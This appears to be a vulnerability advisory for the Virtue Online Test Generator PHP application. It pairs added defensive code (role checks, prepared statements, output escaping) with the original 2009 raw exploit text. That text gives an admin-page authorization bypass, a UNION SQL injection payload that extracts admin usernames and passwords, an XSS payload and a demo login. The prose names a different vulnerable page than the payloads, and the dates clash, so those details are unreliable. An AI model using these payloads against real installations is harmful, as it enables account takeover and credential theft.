Vendor: Virtue Online Test Generator
Author: HxH
CVSS: 8.8 (HIGH)
Vulnerability Types: Authentication Bypass, SQL Injection, Cross-Site Scripting
CWE: 89, 79, 79
Product Name: Virtue Online Test Generator
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities

Virtue Online Test Generator is vulnerable to authentication bypass, SQL injection and cross-site scripting. Once logged in as an ordinary user, an attacker can reach administrative functionality by requesting the admin/index.php page directly, bypassing the authorization check. An attacker can also inject SQL by supplying a crafted value to the admin/test_generator.php page, because the input is concatenated into a database query. Additionally, the same admin/test_generator.php page reflects the input into the response without output encoding, so an attacker can inject XSS payloads.

Mitigation:

Ensure that user input is properly sanitized and validated. Use parameterized queries to prevent SQL injection. Use a web application firewall to detect and block malicious requests.
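The mitigations above combined in one hardened PHP request handler, added here as an example; this is not code from the Virtue Online Test Generator project or from the advisory. It assumes a page that takes an integer `tid` query parameter (like the `text.php?tid=` endpoint in the advisory), a session that records the logged-in user's role in `$_SESSION['role']`, a table `tests` with columns `tid` and `test_text`, and placeholder database credentials; every one of those names is an assumption, not something taken from the product.

```php
<?php
// Added example, not the project's own code. All table, column, session-key
// and credential names below are assumptions for illustration.
declare(strict_types=1);

session_start();

// Authorization, not just authentication: the advisory reports that admin
// pages are reachable after any user login. Each admin page must check the
// caller's role server-side instead of relying on the menu hiding the link.
function require_role(string $role): void
{
    if (empty($_SESSION['user_id']) || ($_SESSION['role'] ?? '') !== $role) {
        http_response_code(403);
        exit('Forbidden');
    }
}

// Input validation: tid is an identifier, so accept only a positive integer.
// filter_var returns false for anything else (missing, "null union ...", tags).
function parse_test_id(array $query): ?int
{
    $tid = filter_var($query['tid'] ?? null, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    return $tid === false ? null : $tid;
}

// Parameterized query: the value is bound, never concatenated into the SQL
// text, so user input cannot change the structure of the statement.
function load_test_text(PDO $db, int $tid): ?string
{
    $stmt = $db->prepare('SELECT test_text FROM tests WHERE tid = :tid');
    $stmt->execute([':tid' => $tid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : (string) $row['test_text'];
}

// Output encoding: anything reflected into HTML is escaped, so a stored or
// reflected "<script>" sequence renders as literal text and does not execute.
function render(string $text): string
{
    return '<pre>' . htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</pre>';
}

require_role('admin');

$tid = parse_test_id($_GET);
if ($tid === null) {
    http_response_code(400);
    exit('Invalid test id');
}

// DSN and credentials are placeholders. Native prepares are forced on so the
// driver, not string interpolation, handles parameter binding.
$db = new PDO(
    'mysql:host=localhost;dbname=DB_NAME_PLACEHOLDER;charset=utf8mb4',
    'DB_USER_PLACEHOLDER',
    'DB_PASS_PLACEHOLDER',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]
);

$text = load_test_text($db, $tid);
if ($text === null) {
    http_response_code(404);
    exit('Not found');
}

header('Content-Type: text/html; charset=UTF-8');
echo render($text);
```

The order of the checks matters: the role check runs before any input is touched, so an unauthorized caller never reaches the database; the integer validation rejects a malformed `tid` before the query runs; and the encoding happens at the point of output, so it protects the page regardless of where the text originally came from. A web application firewall can sit in front of this as an additional detection layer, but the handler no longer depends on one to be safe.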

Exploit-DB raw data:

+===================================================================================+
|                                                                                   |
| Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities         |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Author.: HxH                                                                      |
| Contact: HxH[at]live[dot]at                                                       |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Script.: Virtue Online Test Generator                                             |
| Home...: http://www.virtuenetz.com/virtue_test_generator.php                      |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| Exploit: After user login                                                         |
|                                                                                   |
| [+] Auth Bypass                                                                   |
|                                                                                   |
| http://[website]/[script]/admin/index.php                                         |
|                                                                                   |
| [+] SQLi                                                                          |
|                                                                                   |
| http://[website]/[script]/text.php?tid=[SQL]                                      |
|                                                                                   |
| [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin--         |
|                                                                                   |
| [+] XSS                                                                           |
|                                                                                   |
| http://[website]/[script]/text.php?tid=<script>alert(1)</script>                  |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| Demo...: http://www.virtuenetz.com/exam                                           |
| Usrinfo: E-mail:demo@virtuenetz.com ~ Pass:demo                                   |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist                                         |
|                                                                                   |
+===================================================================================+

# milw0rm.com [2009-06-26]